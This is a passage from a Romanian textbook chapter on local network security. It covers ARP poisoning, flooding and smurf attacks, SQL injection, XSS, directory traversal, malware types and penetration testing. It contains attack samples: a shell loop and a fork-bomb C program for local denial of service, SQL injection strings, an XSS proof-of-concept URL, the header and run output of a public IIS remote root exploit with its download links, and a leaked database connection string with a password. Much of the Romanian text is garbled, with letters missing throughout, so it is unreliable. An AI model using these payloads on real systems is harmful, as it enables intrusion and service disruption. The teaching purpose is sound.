o figu ă i , î s opul li ită ii a esului la ediu di afa a a iei de lu u. Î alege ea iptă ii
t e uie ţi ut o t ă atât WEP, ât şi WPA su t p oto oale elati uşo de o p o is. Î
ăsu a î a e o po e tele eţelei fă ă fi o pe it, se e o a dă folosi ea WPA , p oto ol
bazat pe AES.
Pe t u eţelele de up u, ata ato ul a a ea e oie de a es la iezul de up u al
ediului de t a s isie. La a lu ile UTP, ata ul se ezu a la a î depă ta ă aşa de plasti ,
urmând a p i i te ediul u o leşti să se i te epteze se alele ele t i e t a s ise pe
firele de cupru.
Fi a opti ă, deşi este ai g eu de ata at, poate ădea i ti ă u o teh i i ei t uzi e
a e u se azează pe î t e upe ea ediului de t a s isie . U apa at e i te eptează
semnalul luminos dintr-o fi ă î doită poate fi u pă at de pe eBay la ai puţi de U“D.
T e uie e a at ă u astfel de ata e esită a es la ediul fizi . Î plus, p i î doi ea fi ei
se alul lu i os se ate uează, ate ua e e poate fi dete tată de e epto şi folosită î
de la şa ea u ei ala e.
10.1.2.2 Ata uri de i el legătură de date

Ata urile de i el legătură de date p esupu a es î eţeaua lo ală. Lista a esto
atacuri include: atac MAC, atac STP, schimbarea VLAN (VLAN hopping , da şi ARP poisoning,
ata g eu dete ta il şi uşo de folosit î eţelele lo ale a tuale.
357 | “ e u i t a t e a eţelei
Atacul ARP poisoning p esupu e edi e ţio a ea t afi ului di t e o i e staţie di eţeaua
lo ală şi routerul de ieşi e di LAN gateway p i staţia ata ato ului. Acest lucru este realizat
p i t i ite ea de pa hete A‘P atât e e i A‘P, ât şi ăspu su i u i fo aţii alte ate.
Pentru exemplificare, fie azul di figu a de ai jos, î a e staţia C do eşte să
i te epteze t afi ul di t e staţiile A şi B. Pe t u a easta, staţia C a t i ite două pa hete A‘P
de tip ăspu s false: o dată pe t u staţia B, î a e se spe ifi ă faptul ă ad esa de i el a
staţiei A este AA:BB:CC:00:00:13, şi o dată pe t u staţia A, î a e se spe ifi ă faptul ă
adresa de nivel a staţiei B este tot AA:BB:CC:00:00:13.
Astfel, atu i â d staţia A do eşte să t i ită u pa het staţiei B, îl a t i ite staţiei C. La
fel, atu i â d staţia B do eşte să t i ită u pa het staţiei A, îl a t i ite tot staţiei C. Pentru
a p o esul să fu ţio eze, staţia C a t e ui să t i ită pa hetele p i ite staţiilo a e su t
ad esate. Î plus, staţia C t e uie să et i ită pa hetele A‘P false la i te ale egulate.
A easta pe t u ă i t ă ile di ta ela A‘P su t e a uate după u ti p, az î a e staţia a
t i ite u pa het A‘P de i te oga e. Da ă staţia i te ogată ăspu de, i t a ea di ta ela A‘P
a fi a tualizată şi astfel t afi ul u a ai aju ge la staţia C.
C
192.168.1.13
AA:BB:CC:00:00:13
A B
192.168.1.11 192.168.1.12
AA:BB:CC:00:00:11 AA:BB:CC:00:00:12
înainte de atac: înainte de atac

192.168.1.12 AA:BB:CC:00:00:12 192.168.1.11 AA:BB:CC:00:00:11
după atac: după atac

192.168.1.12 AA:BB:CC:00:00:13 192.168.1.11 AA:BB:CC:00:00:13
10-1: Atac ARP poisoning
A est tip de ata , î a e două staţii o u i ă p i t -u i te edia , poa tă u ele de

man in the middle attack. E istă ulte ata u i de a est tip şi di pă ate si gu a soluţie pe t u
evitarea acestor atacuri este autentificarea.
Simpla ipta e a t afi ului u e ită î totdeau a a este tipu i de ata u i. Da ă se foloseşte
o ipta e u o heie pa tajată, atu i se o ţi e u g ad oa e a e de se u itate. Î s hi ,
da ă se foloseşte o ipta e fă ă o heie pa tajată şi fă ă aute tifi a e, în care cheia de criptare
se de i ă p i s hi ul de i fo aţii î t e ele două staţii, g adul de se u itate este ze o:
ata ato ul a sta ili două a ale de o u i aţie, u fie a e di t e ele două staţii, şi, hia
da ă a ele a ale de o u i aţie su t iptate, ata ato ul a e toate i fo aţiile e esa e
pentru decriptare.
Pentru prevenirea unui atac ARP poisoning t e uie o ito izat tot t afi ul A‘P î eţeaua
lo ală, atât la i elul dispoziti elo de i te o e ta e – folosi d s it hu i e i ple e tează
ARP Inspection i te eptează şi alidează toate e e ile şi ăspu su ile A‘P , ât şi la i elul
staţiilo – folosindu-se programe de tip ARPWatch pe t u a dete ta e e tuale s hi ă i î
asocierile IP-MAC. Î a elaşi ti p, pe t u desti aţiile i po ta te de exemplu pentru
gateway , se e o a dă folosi ea de aso ie i stati e î ta ela A‘P.
358 | ‘ e ţ e l e L o a l e
Apa iţia s it hu ilo î eţelele lo ale au t a sfo at ediul pa tajat al Ethernet-ului într-
u ediu dedi at. Astfel, u ad i ist ato de eţea e do eşte o ito iza ea t afi ului ăt e o
a u ită desti aţie a t e ui a, î ai te de a la sa p og a ul de i te epta e a t afi ului, să
fa ă u ata ARP poisoning pe t u espe ti a desti aţie. Pe t u a easta poate folosi o i e
generator de pachete, cele mai utilizate fiind: Cain, dsniff, IPSorcery.
10.1.2.3 Ata uri de i el rețea

Ata urile de i el rețea su t el ai adesea i iţiate di I te et, deşi e istă ata u i de
i el şi î eţelele lo ale, p e u DHCP starvation şi DHCP spoofing.
Din multitudinea atacurilor de nivel 3 cele mai întâlnite sunt atacurile bazate pe flooding,
sau cele bazate pe DoS (Denial of Service) sau mai nou DDoS (Distributed DoS).
Un flood ep ezi tă u u ă foa te a e de pa hete e ite î t -un interval scurt de
timp. Un trafic ce poate fi interpretat drept flood la nivelul routerului de a es î eţeaua
lo ală poate fi t atat d ept t afi o al î u leul I te etului. Pe t u teh ologiile a tuale, u
flood este defi it astfel: la i elul u ui s it h de i el u u ă de . - 150.000 de
pachete pe se u dă, ia la i elul u ui router de a es e o e tează o eţea lo ală u flood
are 8.000- . de pa hete pe se u dă. Î u leul I te etului u t afi de sute de ilioa e
de pa hete pe se u dă poate fi t atat d ept t afi legiti , de a eea u flood se ide tifi ă după
tipul t afi ului şi u după u ă ul de pa hete.
Atacurile bazate pe flooding pot folosi conexiuni TCP, mai exact pachete de SYN (atacul
numindu-se SYN flooding , ât şi pa hete ICMP sau UDP. Î azul SYN flooding, atacatorul va
trimite u u ă foa te a e de e e i de des hide e a u ei oi o e iu i TCP pa hete e au
â pul de o t ol “YN setat . “e e ul ţi tă a ăspu de u pa hete e au â pu ile ACK şi
“YN setate. Ata ato ul u a t i ite i iodată pa hetul de sta ili e a o e iu ii (o sesiune TCP
se azează pe three-way handshake . Astfel, sesiu ile o ă â e î sta ea half-open,
consumând resurse în continuare pe server.
Me a is ele de p ote ţie î pot i a ata u ilo SYN flood se azează pe sta ili ea u ui
timp maxim pentru stabilirea unei conexiuni (timp în care conexiunea poate fi în starea half-
open , a u ui u ă a i de o e iu i half-open (valoare de la care conexiunile half-open
o î epe să fie şte se . O altă a o da e se u eşte SYN cookies. A eastă etodă pe ite
severului să e ite î lătu a ea o e iu ilo , â d oada î a e su t păst ate “YN-urile devine
pli ă, se e ul o po tâ du-se o al, a şi â d a easta di u ă a fi fost ă ită. “e e ul
î a est az, a t i ite î apoi lie tului u ăspu s de fo a “YN+ACK, da a şte ge di oadă
i t a ea o espu zătoa e pa hetului e o ţi ea itul “YN setat. Da ă se e ul a p i i u
pa het de ăspu s de la lie t u itul ACK setat, atu i o e iu ea poate fi sta ilită, i t a ea
e fusese ştea să putâ d fi e o st uită pe aza u ă ului de se e ţă di a tetul TCP.
ICMP flooding se azează pe t i ite ea u ui u ă foa te a e de pa hete ICMP,
o su â d î t eaga lăţi e de a dă dispo i ilă. Cel ai adesea ata ul este p e e it p i
filtrarea întreg traficului ICMP, cu costul pie de ii fu ţio alităţi utilita elo ping şi
traceroute.
Atacul UDP flooding este u ade ă at dist u ti â d foloseşte d ept ţi tă po tu ile şi ,
adi ă se i iile de echo şi chargen. A este se i ii, fii d a folosite î eţele lo ale, pot fi
oprite de firewall-ul de i t a e î LAN, fă ă u i pa t eal asup a fu ţio ă ii eţelei.
Atacurile bazate pe flooding sunt în general combinate cu un atac de tip spoofing, prin
a e se ge e ează ad ese su să fi ti e şi dife ite pe t u pa hetele di flood (altfel o filtrare pe
aza depăşi ii u ui u ă li ită de pa hete pe su să a eli i a ata ul . Ata ul spoofing
asigu ă î a elaşi ti p as u de ea ide tităţii ata ato ului. Î plus, da ă desti aţia ata ului
bazat pe flooding u este o su să ţi tă i ad esa de difuza e a u ei eţele, toate e hipa e tele
di espe ti a eţea o î e a să ăspu dă u ei su se e u e istă î ealitate. A est ata

este de tip DDo“ şi se u eşte ata smurf.
ICMP REPLY D=173.1.1.1 S=64.8.12.5
ICMP REPLY D=173.1.1.1 S=64.8.12.6
ICMP REPLY D=173.1.1.1 S=64.8.12.7
ICMP REPLY D=173.1.1.1 S=64.8.12.8

173.1.1.1
ICMP REPLY D=173.1.1.1 S=64.8.12.9
ICMP REPLY D=173.1.1.1 S=64.8.12.10
ICMP REQ D=64.8.12.255 S= 173.1.1.1
10-2: Atacul smurf
Aşa u a fost e ţio at şi la î eputul apitolului, e istă t ei fo e p i a e u ata de

tip Do“ poate fi i iţiat: ata u ile di e te io , e ite di I te et, ata u i i iţiate di eţeaua
lo ală şi ata u i ge e ate de pe a eeaşi aşi ă. Ata u ile di e te io pot a ea a ţi tă:
î hide ea a u ito se i ii, deza ti a ea o tu ilo utilizato ilo , utiliza ea aliţioasă a
telnet sau finger. Ca metode de atac din interior putem enumera: umplerea harddisk-ului,
crearea de procese la i fi it, ea ea de fişie e g eu de şte s. Î e e plul de ai jos se o
crea la infinit în directorul .ddd su di e toa e u a elaşi u e.
while : ; do
mkidir .ddd
cd .ddd
done
U alt e e plu de ata i te îl ep ezi tă utiliza ea fu ţiei fork(), în scopul ge e ă ii

continue de procese.
#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>
main()
{
int x;
for (x=0;x<1000000;x++)
{
system(“sync”);
fork();
}
}
Ata u ile DDo“ po es de la pute ea e o ă de al ul dispo i ilă î eţelele a tuale

lo ale. U ele di t e a este ata u i pot fi ei te ţio ate, p e u î azul Slashdot effect.
Numele vine de la cunoscutul site Slashdot, care a postat un link ăt e u site u apa ilităţi
ai i i. Câ d foa te ulţi utilizato i au î e at să a eseze espe ti ul site, efe tul a fost
echivalent cu un atac SYN flood.
Ata u ile DDo“ se azează î ge e al pe i fe ta ea u ui u ă ât ai a e de staţii, şi
oo do a ea u ui ata ăt e a eeaşi ţi tă. U astfel de ata a fost ge e at de i usul MyDoom.
360 | ‘ e ţ e l e L o a l e
Tot î atego ia DDo“ i t ă şi i uşi de tip IRCBots, p og a e a e după i fe ta ea u ei

staţii o i iţia o o e iu e ăt e u se e de I‘C pe u a al p i at, ata ato ul putâ d să
o t oleze toate staţiile i fe tate. U IRCBot a des hide şi po tul 6667 (portul implicit pentru
I‘C pe aşi a i fe tată.
10.1.2.4 Ata uri de i el apli ație

Ata urile de i el apli ație e ploatează î ge e al ul e a ilităţi ale apli aţiilo e .
“u ie tul este a plu. Cei e o să u ă eas ă etodele de e ploata e a ul e a ilităţilo de
i el apli aţie pot să î eapă u a tea lui Joel “ a a : Hacking Exposed Web Applications,
Second Edition.
Ata u ile de i el pot a ea d ept ţi tă şi teh ologiile di spatele apli aţiilo e , u
u ă i po ta t de ata u i fii d di e ţio ate î pot i a azelo de date. Cel ai u os ut
atac de aceast fel este Inserarea de cod SQL (SQL Injection . A est ata se azează pe odul
di e t de i te oga e a azei de date. Astfel, da ă i te oga ea ealizată este:
SELECT X from TABLE where
user = $user_input AND
pass = $pass_input
atu i, la i t odu e ea î â pul utilizato a u ui u e alid de utilizato u at de OR -

- , dat fii d ă î “QL i t odu e ea si olu ilo -- defi eşte u o e ta iu, ope aţia de
sele ţie de i e:
SELECT X from TABLE where
user = $xxx OR -- AND
pass = „nu_conteaza‟
şi a fi alidată pe t u o i e u e de utilizato aflat î aza de date. Me gâ d ai

depa te, se poate i t odu e î â pul utilizato : xxx OR 1=1 OR -- , a easta ga a tâ d
a esul i dife e t da ă utilizato ul e istă sau u î aza de date.
Pe t u a p e e i u astfel de ata , i te oga ea azei de date t e uie fă ută p i fu ţii de
i liote ă şi u di e t p i “ELECT.
Este e esa să se at agă di ou ate ţia în special asupra riscului de securitate adus de
utilizato ii eglije ţi di eţea. Chia şi î azul u o utilizato i espo sa ili u t e uie ig o ate
riscurile unui ata azat pe i gi e ie so ială - adi ă pe a ipula ea i di izilo pe t u o ţi e ea
a esului la i fo aţii o fide ţiale sau alte esu se. Nu este o î tâ pla e ă el ai u os ut
hacker al tuturor timpurilor este Kevin Mitnick, u o u u oști ţe teh i e li itate, da u o
u ă î ţelege e a psihologiei utilizato ilo şi a ad i ist ato ilo di eţelele a tuale.
10.1.2.5 Atacuri web

O clasă tot ai ele a tă a tual e te a ata u ilo de i el apli aţie o ep ezi tă ata u ile
e . Dato ita atu iză ii I te etului şi olu elo idi ate de t a za ţii o li e, ajo itatea
ata u ilo di ulti a pe ioadă se o e t ează asup a se i iilo ofe ite pe net. Pe de o parte,
po tu ile aso iate a esto a t e uie să fie tot ti pul des hise, ia pe de alta, p oto oalele
folosite u au fost i iţial o epute pe t u agazi e i tuale sau plăţi ele t o i e, u atât ai
puţi fii d luate î al ul o side e tele de securitate.
Astfel, de-a lu gul ti pului au fost aduse ulte î u ătăţi i pe t u a pe ite apli aţiilo
e să se eas ă o ie ti ele a tuale, p e u ipta ea o u i aţiilo peste u a al ““L
HTTP“ , e ţi e ea u ei sesiu i î t e lie t şi se e folosind cookie-uri, animarea
o ţi utului pagi ilo e u XHTML, C““, JavaScript sau Flash, o u i aţia asi o ă
folosind AJAX - o du â d utilizato ul ăt e o e pe ie ţă We . , puţi peti ită di pu t de
ede e al se u ităţii.
Atacurile pe Web se împart î două atego ii: ata u i asup a platformei: sistem de
ope a e, se i ii, o u i aţii, şi ata u i asup a apli ației, a e izează o p o ite ea
sistemului sau a utilizatorului.
Atacurile asupra platformei se azează pe e ploata ea u o ul e a ilităţi în sistemul de
ope a e, î se i iile e puse, sau î p oto oalele utilizate. A estea u ă es o ţi e ea
a esului la date eauto izate sau i apa ita ea se i iului. A este ata u i e ifi ă po tu ile
deschise în firewall, e siu ile se i iilo a ti e şi apoi aută ul e a ilităţi u os ute pe a e
să le utilizeze pe t u a o ţi e a es la siste e. Ata u ile se pot aza, de e e plu, pe bug-uri
î e siu ile de ““H, î se e ele de FTP, DN“ sau “MTP şi el ai adesea hia î se e ele
Web (Apache sau IIS).
Va fi prezentat î o ti ua e u e e plu u os ut de eșă de se u itate p eze tă î II“:
Microsoft Windows IIS 5.0 Remote Buffer Overflow, publicat în buletinul de securitate MS04-
011. Codul exploit-ului poate fi o ţi ut de la http://www.milw0rm.com/exploits/275 şi
compilat cu cl Visual C . Ata ul se azează pe e ploata ea u ui buffer overflow în serverul de
e şi ge e ează u shell a e as ultă pe u po t spe ifi at la ula e.
Extras din codul exploit-ului:
/*****************************************************************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
/* v0.2 - This little update uses a connectback shell ! */
/* v0.1 - First release with portbinding shell on 31337 */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/
Rularea exploit-ului:
C:\>iisexploit www.site.com myserver 8082
THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
Ase e ea ata u i e istă şi pe t u Apa he. De e e plu, e iste ţa u ui ug î biblioteca

openssl permite deschiderea unui shell prin atacarea unui se e e a e folosește ““L1.
Ata urile asupra apli ației We se azează pe ul e a ilităţi î odul de p og a a e, pe
bug-u ile şi eșele de se u itate i e e te li ajului de p og a a e, sau pe g eșelile
p og a ato ilo . Ata u ile asup a apli aţiilo We a ope ă două ţi te: o p o ite ea
siste ului, p i o ţi e ea a esului eauto izat pe u ul di t e se e ele de apli aţie sau aze
de date, sau o p o ite ea lie tului, p i o ţi e ea i fo aţiilo o fide ţiale ale a estuia,
fu tul sesiu ii, sau e e uţia de od pe ași a a estuia.
Majo itatea ata u ilo asup a apli aţiilo e su t dato ate alidă ii i sufi ie te a datelo
de i t a e ale apli aţiei: a estea pot fi date i t oduse de utilizato i, â pu i as u se ale
formularelor, parametri ai paginilor dinamice, variabile aflate în cookie-uri, antete HTTP, etc.
Dato ita faptu ilo ă apli aţiile e su t ete oge e p i defi iţie, ata a ea a esto a u se
1
Codul exploit-ului poate fi găsit ai i: http://www.securiteam.com/exploits/5HP0P1F8AM.html.
362 | ‘ e ţ e l e L o a l e
azează atât de ult pe ul e a ilităţi u os ute, ât pe o etodologie pa ti ula ă, spe ifi ă

fie ă eia. Bazele de date CVE (Common Vulnerabilities and Exposures o ţi i fo aţii desp e
apli aţii pa ti ula e des î tâl ite pe e Wordpress, PHPBB). În continuare vor fi analizate
ul e a ilităţile ge e ale ale apli aţiilo e , şi o fi detaliate ele de mare notorietate.
Vul e a ilităţile î p o esul de aute tifi a e i pli ă u ul di t e u ătoa ele s e a ii:
o ţi e ea eauto izată a i fo aţiilo de aute tifi a e, spoof-a ea ide tităţii utilizato ului,
i te epta ea i fo aţiilo de loga e, spa ge ea algoritmilor de criptare sau retransmiterea
datelo , fu tul sesiu ii sau atașa ea la o sesiu e alidă. P o esul de auto iza e i pli ă a ţiu ile
pe care le poate întreprinde un utilizator autentificat, iar atacurile includ escaladarea
o izo tală a p i ilegiilo , cum ar fi accesarea datelor din profilul altui utilizator al unui magazin
o li e, sau es alada ea e ti ală a p i ilegiilo , p e u a esa ea u o pagi i spe ifi e
administratorilor magazinului.
Cross-Site Scripting (XSS) este cel mai frecvent atac direcţio at ăt e o p o ite ea
lie ţilo î tâl it pe e -ul a ilo . A est tip de ata izează pa a et ii i o plet
e ifi aţi de ăt e apli aţie î pot i a u o a aje spe ifi e HTML / Javascript („,<,/>,et . şi
a e su t utilizaţi de ăt e apli aţie î ge e a ea ăspu su ilo . Astfel, alte a ea a esto
pa a et i poate i je ta o i e od e e uta il pe lie t î pagi ile ul e a ile ale apli aţiei.
A est od poate să i pe so eze utilizato ul î fata apli aţiei, să fu e datele de aute tifi a e,
sau să foloseas ă ai depa te o ul e a ilitate a browser-ului lie tului pe t u a des ă a şi
e e uta od i a pe ași a a estuia.
E istă două posi ilităţi de a e ploata a eastă vulnerabilitate:
 „Reflected Cross-Site Scripting : Pagi a ul e a ilă utilizează o pa te din datele de intrare
pa a et ii GET, PO“T, a tete HTTP, et î ge e a ea ăspu sului. Astfel, p i apela ea u ei
ase e ea pagi i u u pa a et u e o ţi e od HTML/Ja as ipt, a esta a fi efle tat –
i je tat î ăspu sul ge e at de ăt e se e .
 „Stored Cross-Site Scripting : Ata ato ul ide tifi ă u pa a et u al u ei pagi i a e este
p o esat şi sto at î t -o su să de date astfel î ât î o e tul î a e datele sal ate su t
î ă ate de ăt e o altă pagi ă şi posi il u alt utilizato a estea să fie i t oduse a şi od
executabil pe sistemul clientului.
O pagi ă e a ată_i fo.php u u ăto ul od su să:
<?php
...... (cod omis pentru brevitate)
if (search($_GET[‚id‟])==0) // functia search nu gaseste id-ul
// afiseaza mesaj de eroare
echo „ID-ul „.$_GET[‚id‟].” nu este valid”;
else
......
?>
este ul e a ilă la u ata X““ a e o ţi e u ăto ul payload PoC (proof-of-concept):

http://server.vulnerabil.com/arata_info.php?id=<script>alert(„XSS‟);</script>
unde codul script-ului JavaScript u a fa e de ât să afişeze u esaj de ale tă.

Server Injections ep ezi tă o atego ie de ata u i de a i i pa t a e au a ţi tă
compromiterea serverelor dintr-u siste o li e. Ata u ile se azează pe validarea
i sufi ie tă a datelo de i t a e, pe iţâ d astfel i je ta e de od “QL, LDAP, XPATH î
componentele de backend, sau ula ea odului aliţios di e t pe se e ul e .
E e uţia de od aliţios di e t pe se e ul e este posi ilă î azul apelu ilo
nesecurizate la comenzi de sistem, folosind de e e plu fu ţia eval() din PHP cu date
e alidate a e pot fi i je tate de ăt e u ata ato , sau folosi d și u i spe iale e e uta ile
încadrate între ghilimele inverse: echo `date`.
Cel mai cunoscut astfel de atac este inserarea de cod SQL (SQL Injection), atac prezentat
a te io la atego ia ata u ilo de la i elul apli aţie.
Insecure Object Reference, sau atacul de tip Directory Traversal este spe ifi apli aţiilo
e , şi se azează pe efe e ţie ea u ei esu se u fișie , de e e plu pe aza u o
info aţii a e pot fi a ipulate de u ata ato . A esta a putea să iteas ă di e se fișie e de
pe serverul web (etc/shadow) sau ar putea injecta cod extern (de pe un alt server) în paginile
apli aţiei.
Information Leakage / Error Handling este o altă ul e a ilitate des î tâl ită î azul
apli aţiilo e . A easta se dato ează u o e o i de o figu a e a se e ului e , sau
g eșelilo de p og a a e a e pot di ulga p ea ulte i fo aţii desp e i f ast u tu a i te ă,
o ite ii deza ti ă ii opţiu ilo de debugging pe ediul î p odu ţie, et . U e e plu de
apli aţie auditată î ealitate o ţi ea î t -u a di t e pagi ile A“P u ăto ul o e ta iu
HTML:

A esâ d pu şi si plu u U‘L de fo a http://server.vulnerabil.com/include/

connections.inc poate î toa e u ăspu s de fo a:
<%
' FileName="Connection_ado_conn_string.htm"
' Type="ADO"
' DesigntimeType="ADO"
' HTTP="false"
' Catalog=""
' Schema=""
Dim MM_Connection_STRING
MM_Connection_STRING = "Driver={SQL Server};Server=SITE1;Database=
Customers;Uid=sa;Pwd=tsVrH4k13web!*;"
%>
10.1.2.6 Viruşi, troie i, ier i

U i us este u p og a sau o se e ţă de od e se ataşează alto fişie e e e uta ile
fă ă a eptul sau u oşti ţa utilizato ului. U i us i lude, alătu i de mecanismele de
e e uţie, şi odalităţi de epli a e i se ate î odul altei apli aţii.
Clasifi a ea i uşilo î fu ţie de odul de epli a e disti ge î t e ai ulte tipu i, di t e
a e ei ai î tâl iţi su t: i uşi de e-mail, de macro, bombe logice, i uşi de boot, ie i, şi
troieni.
U lu u i po ta t de p e izat este ă si pla p eze ţă a u ui fişie i fe tat pe u
al ulato u este e hi ale tă u i fe ta ea siste ului. Pe t u a i fe ta siste ul u i us
t e uie să fie e e utat el puţi odată. Di pă ate u ele apli aţii ulează od e e uta il î od
auto at fă ă i fo a ea utilizato ului .
Email-ul este u ul di t e ăile p i ipale de p opaga e a i uşilo . Viruşii de e-mail sunt
o ţi uţi î ataşa e tul e-mail-ului, deseori având extensia schi ată el ai adesea î
e te sie spe ifi ă i agi ilo . Apli aţia ţi tă a u ui astfel de i us este lie tul de e-mail.
Dato ită u ă ului a e de utilizato i ai lie tului de e ail MS Office Outlook, o mare parte a
a esto i uşi su t dez oltaţi spe ial pe t u a eastă apli aţie.
Odată e e utat u ataşa e t i fe tat di e- ail, i usul se î a ă î e o ia ‘AM şi a
u ă i să se ultipli e. Pe t u a easta, a ăuta lista de ad ese folosite î lie tul de e-mail
(address book . Majo itatea apli aţiilo lient de e- ail eează lista de ad ese î od di a i ,
fă ă o sulta ea utilizato ului. Odată des hisă lista de ad ese, i usul a folosi di e t API-ul de
trimis e-mail-u i pe t u a se ultipli a. E e plele de i uşi de e ail su t MyDoom, I love you,
etc.
Falşii i uşi de ail email virus hoaxes su t esaje a e p eti d ă au ide tifi at p eze ţa
i i e tă a u ui i us şi soli ită utilizato ului să fo a deze esajul ăt e toţi u os uţii; hia
î a se ţa u ui i us eal, u fals i us poate p odu e pagu e o side a ile p i a ţiu ile
oti ate de pa i ă ale utilizato ilo .
364 | ‘ e ţ e l e L o a l e
O a doua atego ie i po ta tă de i uşi o ep ezi tă iruşii de a ro. Un macro este o

u ată de od i te p eta il sau e e uta il, ataşată u ui fişie do u e t. Apli aţiile ţi tă
pentru a eşti i uşi su t ele de gestio a e a do u e telo ge editoa e de te t, al ul
ta ela , sau editoa e de p eze tă i. A este apli aţii o ate ţio a î ge e al utilizato ul î ai te
de des hide ea u ui do u e t e o ţi e macro-uri.
Pentru a reduce gradul de is , da ă la des hide ea u ui fişie se p i eşte a e tiza ea de
e iste ţă a unor macro-uri, se e o a dă î hide ea documentului şi ula ea unui program
a ti i us pe espe ti ul fişie .
Viruşii de oot u ep ezi tă o a e i ţa e ajo ă pe t u siste ele a tuale dato ită
difi ultăţii de la sa e î e e uţie. Pe t u a la sa u astfel de i us, siste ul t e uie să î e e
i iţializa ea de pe o pa tiţie i fe tată. I pa tul a esto i uşi s-a di i uat odată u dispa iţia
floppy dis u ilo . Î p eze t i uşii de boot se pot propaga ori prin CD-uri, ori prin flash card-
uri.
Troienii (trojan horses ep ezi tă apli aţii e o ţi sau i stalează u p og a aliţios.
Pe t u a e ita astfel de ata u i se e o a dă i stala ea apli aţiilo doa di lo aţii sigu e,
p e u şi e ifi a ea i teg ităţii fişie elo î ai te de i stala e.
Viermii (worms su t p og a e e foloses ul e a ilităţi î dife ite se i ii di I te et
pe t u a se ultipli a. “p e deose i e de i uşii p op iu-zişi, ie ii u t e uie să se ataşeze
de u alt p og a . Majo itatea ie ilo u ă es doa să se p opage, fă ă a alte a fişie ele
din sistemul respectiv – auzâ d dau e î spe ial dato ită o su ului de esu se di eţea.
Pe t u a edu e i pa tul i uşilo su t i po ta te atât ăsu ile luate la i elul eţelei,
ât şi e e sa ea u o dep i de i di pa tea utilizato ilo .
Astfel, este i po ta t a a esul î eţea să fie p otejat de u firewall (dispozitiv de filtrare
atât a t afi ului de i t a e î eţea, ât şi elui de ieşi e , a se e ul de e- ail să ai ă i stalat
u a ti i us, să e iste o politi ă de o ito iza e a se i iilo , et .
La i elul utilizato ului este i po ta t să u la seze î e e uţie fişie e p i ite p i e-mail,
să u des hidă ataşa e te p i ite de la e u os uţi, să e ţi ă u a ti i us a tualizat pe
staţia de lu u, et . Î a elaşi ti p este i po ta t să u fie i stalate p og a e a ti i us
redundante, deoarece prin consumul de resurse acestea pot afecta semnificativ
pe fo a ţele siste ului.
10.1.3 Prevenirea atacurilor

Securiza ea u ui siste sau a u ei eţele pot p esupu e i estiţii i po ta te atât î
e hipa e te, ât şi î software. Cu toate a estea, o i e soluţie de se u itate u t e uie să
pia dă di ede e âte a o po e te de ază.
P i ul pas î o i e soluţie de se u itate o ep ezi tă stabilirea unor politici clare de
securitate. O astfel de politi ă de se u itate a u ă i:
 separarea ariilor cu nivel de securitate diferit;
 defi i ea la ă a d eptu ilo fie ă ui utilizato ;
 defi i ea se i iilo e t e uie ofe ite de ăt e fie a e o po e tă a eţelei.
Odată sta ilită politi a de se u itate a t e ui est i ţio at t afi ul e u este p e ăzut de
aceasta prin configurarea politicilor de filtrare a pachetelor.
I fe ta ea staţiilo di t -o eţea lo ală poate ofe i o poa tă de acces unui atacator în
spatele firewall-ului, edu â d g adul de se u itate al eţelei. Di a est oti u ad i ist ato
responsabil nu se va ocupa doar de configurarea firewall-ului şi a se e elo , da şi de
se u iza ea staţiilo de a es. Cel ai i po ta t pas î a est se s o ep ezi tă configurarea şi
î t eţi e ea programelor antivirus.
O o po e tă i po ta tă a se u ităţii o ep ezi tă o fide ţialitatea. Î s opul p otejă ii

u o date se si ile se e o a dă o figurarea riptării trafi ului. Nu trebuie pie dut î să di
ede e o su ul a e de esu se ai ales p o eso p esupus de ope aţia de ipta e.
10.2 Auditarea reţelei

Testele de penetrare (pentest ealizează o a aliză o ple ă a se u ităţii siste ului
i fo ati auditat, testâ d efi a itatea ăsurilor de securitate implementate prin executarea
u o ata u i eale. A ti ităţile se azează pe p a ti i de „ethi al ha ki g , iar posturile pe care
le ia o e hipă de audit „tige tea sau „ ead tea în jargon) pot fi:
 Black-box – ata ato ul u u oaște nicio i fo aţie desp e siste ul auditat, u e epţia
numelui sau a unei adrese IP;
 Grey-box – audito ul deţi e ap io i i fo aţii desp e siste ; olu ul a esto a a iază î
fu ţie de o ie ti ele testelo - spre exemplu, poate fi vorba despre testarea unei eţele di
perspectiva unui angajat;
 White-box – e hipa de audit a e a es la o i e i fo aţie desp e siste i luzâ d odul su să
sau p i ilegii ad i ist ati e. A est tip de teste este i po ta t î ide tifi a ea eșelo pe
sistemele închise sau pentru a aliza ea u o soluţii î ai te de a fi i stalate î ediul de
p odu ţie; de ase e ea, a est pas poate i lude u „“e u it Code Re ie .
A ti ităţile u ui test de pe et a e o de a a p i t -o fază de ole ta e a i fo aţiilo ,
o ti uâ d u s a ă i. Pe aza i fo aţiilo o ţi ute o fi sele tate î o ti ua e ata u i de
o ţi e e a a esului sau de o p o ite e a fu ţio alităţii Denial-of-Service). În cazul unui
ata de o ţi e e a a esului ealizat u su es, u ata ato a u a p o edu ile de a ope ire a
u elo , de e ţi e e a a esului ulte io p i sta ili ea u ei etode sta ile de a o u i a
u staţia o p o isă şi de e ti de e a i flue ţei p i ula ea u o oi teste di poziţia e e t
o ţi ută. U ulti pas al a ti ităţilo de pentest este repreze tat de al ătui ea u ui apo t
o plet pe aza tutu o i fo aţiilo o ţi ute şi a î e ă ilo efe tuate.
Faza de re u oaştere sau „reconnaisance este etapa î a e, o t a așteptă ilo , u
ata ato îşi pet e e ajo itatea ti pului. Cole ta ea i fo aţiilo poate fi pasi ă sau a ti ă.
‘e u oaşte ea pasi ă se ealizează fă ă i te a ţiu e u siste ul ţi tă şi o ţi e teh i ile de
sniffing, analiza pachetelor cu utilitare dedicate precum p0f, netcraft, et şi i estiga ea
bazelor de date publice: Google, Archive.org, Rapoarte Financiare, ARIN, RIPE, etc.
‘e u oaște ea a ti ă i pli a sta ili ea u o o e iu i ăt e siste ul auditat p i folosi ea
